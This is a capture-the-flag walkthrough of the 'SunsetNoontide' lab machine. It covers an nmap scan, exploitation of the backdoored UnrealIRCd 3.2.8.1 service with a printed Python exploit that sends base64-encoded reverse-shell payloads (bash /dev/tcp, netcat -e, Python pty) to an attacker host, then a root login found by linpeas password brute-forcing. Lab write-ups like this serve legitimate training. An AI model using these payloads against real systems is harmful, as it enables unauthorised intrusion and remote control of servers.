Skip to main content

SunsetNoontide

Reconnaissance

Nmap scan

Let's perform an nmap scan to find the open ports and the services running on the open ports.

$ nmap -T5 -Pn -A -p- 192.168.202.120
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 09:13 EDT
Warning: 192.168.202.120 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.202.120
Host is up (0.067s latency).
Not shown: 63888 closed tcp ports (conn-refused), 1644 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd (Admin email example@example.com)
Service Info: Host: irc.foonet.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 330.87 seconds

There are three open ports:

PortService
6667irc
6697irc
8067irc

 

Exploitation

Obtaining reverse shell

Using third party exploit

We can obtain a reverse shell on the target using a this exploit.

1

$ wget https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py
--2024-08-10 09:52:21-- https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py
Resolving github.com (github.com)... 20.207.73.82, 64:ff9b::14cf:4952
Connecting to github.com (github.com)|20.207.73.82|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘exploit.py’

exploit.py [ <=> ] 341.74K --.-KB/s in 0.01s

2024-08-10 09:52:22 (23.4 MB/s) - ‘exploit.py’ saved [349940]

Once downloaded, we have to modify the exploit slightly, setting our IP address.

exploit.py
#!/usr/bin/python3
import argparse
import socket
import base64

# Sets the target ip and port from argparse
parser = argparse.ArgumentParser()
parser.add_argument('ip', help='target ip')
parser.add_argument('port', help='target port', type=int)
parser.add_argument('-payload', help='set payload type', required=True, choices=['python', 'netcat', 'bash'])
args = parser.parse_args()

# Sets the local ip and port (address and port to listen on)
local_ip = '192.168.45.234' # CHANGE THIS
local_port = '9999' # CHANGE THIS

# The different types of payloads that are supported
python_payload = f'python -c "import os;import pty;import socket;tLnCwQLCel=\'{local_ip}\';EvKOcV={local_port};QRRCCltJB=socket.socket(socket.AF_INET,socket.SOCK_STREAM);QRRCCltJB.connect((tLnCwQLCel,EvKOcV));os.dup2(QRRCCltJB.fileno(),0);os.dup2(QRRCCltJB.fileno(),1);os.dup2(QRRCCltJB.fileno(),2);os.putenv(\'HISTFILE\',\'/dev/null\');pty.spawn(\'/bin/bash\');QRRCCltJB.close();" '
bash_payload = f'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'
netcat_payload = f'nc -e /bin/bash {local_ip} {local_port}'

# our socket to interact with and send payload
try:
s = socket.create_connection((args.ip, args.port))
except socket.error as error:
print('connection to target failed...')
print(error)

# craft out payload and then it gets base64 encoded
def gen_payload(payload_type):
base = base64.b64encode(payload_type.encode())
return f'echo {base.decode()} |base64 -d|/bin/bash'

# all the different payload options to be sent
if args.payload == 'python':
try:
s.sendall((f'AB; {gen_payload(python_payload)} \n').encode())
except:
print('connection made, but failed to send exploit...')

if args.payload == 'netcat':
try:
s.sendall((f'AB; {gen_payload(netcat_payload)} \n').encode())
except:
print('connection made, but failed to send exploit...')

if args.payload == 'bash':
try:
s.sendall((f'AB; {gen_payload(bash_payload)} \n').encode())
except:
print('connection made, but failed to send exploit...')

#check display any response from the server
data = s.recv(1024)
s.close()
if data != '':
print('Exploit sent successfully!')

Let's set up a nc listener.

$ nc -nlvp 9999                     
listening on [any] 9999 ...

Let's send the exploit payload.

$ python3 exploit.py -payload bash 192.168.202.120 6697
Exploit sent successfully!

We can now check back on our nc listener.

$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.202.120] 42784
bash: cannot set terminal process group (433): Inappropriate ioctl for device
bash: no job control in this shell
server@noontide:~/irc/Unreal3.2$

 

Post Exploitation

local.txt

server@noontide:~/irc/Unreal3.2$ cd /home/server
cd /home/server
server@noontide:~$ cat local.txt
cat local.txt
573899f75943f510d8807e6af75a5a71

Privilege Escalation

Enumerating Privilege Escalation vectors using Linpeas

In order to find a privilege escalation vector we have to use the Linpeas utility.

$ python3 -m http.server                               
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
server@noontide:~$ wget http://192.168.45.234:8000/linpeas.sh
wget http://192.168.45.234:8000/linpeas.sh
--2024-08-10 10:11:55-- http://192.168.45.234:8000/linpeas.sh
Connecting to 192.168.45.234:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860335 (840K) [text/x-sh]
Saving to: ‘linpeas.sh’

0K .......... .......... .......... .......... .......... 5% 285K 3s
50K .......... .......... .......... .......... .......... 11% 722K 2s
100K .......... .......... .......... .......... .......... 17% 196K 2s
150K .......... .......... .......... .......... .......... 23% 2.08M 2s
200K .......... .......... .......... .......... .......... 29% 824K 1s
250K .......... .......... .......... .......... .......... 35% 888K 1s
300K .......... .......... .......... .......... .......... 41% 980K 1s
350K .......... .......... .......... .......... .......... 47% 1.48M 1s
400K .......... .......... .......... .......... .......... 53% 892K 1s
450K .......... .......... .......... .......... .......... 59% 862K 1s
500K .......... .......... .......... .......... .......... 65% 2.07M 0s
550K .......... .......... .......... .......... .......... 71% 874K 0s
600K .......... .......... .......... .......... .......... 77% 836K 0s
650K .......... .......... .......... .......... .......... 83% 1.10M 0s
700K .......... .......... .......... .......... .......... 89% 1.35M 0s
750K .......... .......... .......... .......... .......... 95% 879K 0s
800K .......... .......... .......... .......... 100% 2.11M=1.1s

2024-08-10 10:11:57 (740 KB/s) - ‘linpeas.sh’ saved [860335/860335]

Let's make it executable.

server@noontide:~$ chmod +x linpeas.sh                 
chmod +x linpeas.sh

We can use the -a option for brute-forcing.

server@noontide:~$ ./linpeas.sh -a
./linpeas.sh -a

<SNIP>

╔══════════╣ Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds

Bruteforcing user root...
You can login as root using password: root

<SNIP>

Logging in as the root user

server@noontide:~$ su root
su root
Password: root
whoami
root

proof.txt

cat /root/proof.txt
8b06a7b03fb1b275742e0e3f1aec0569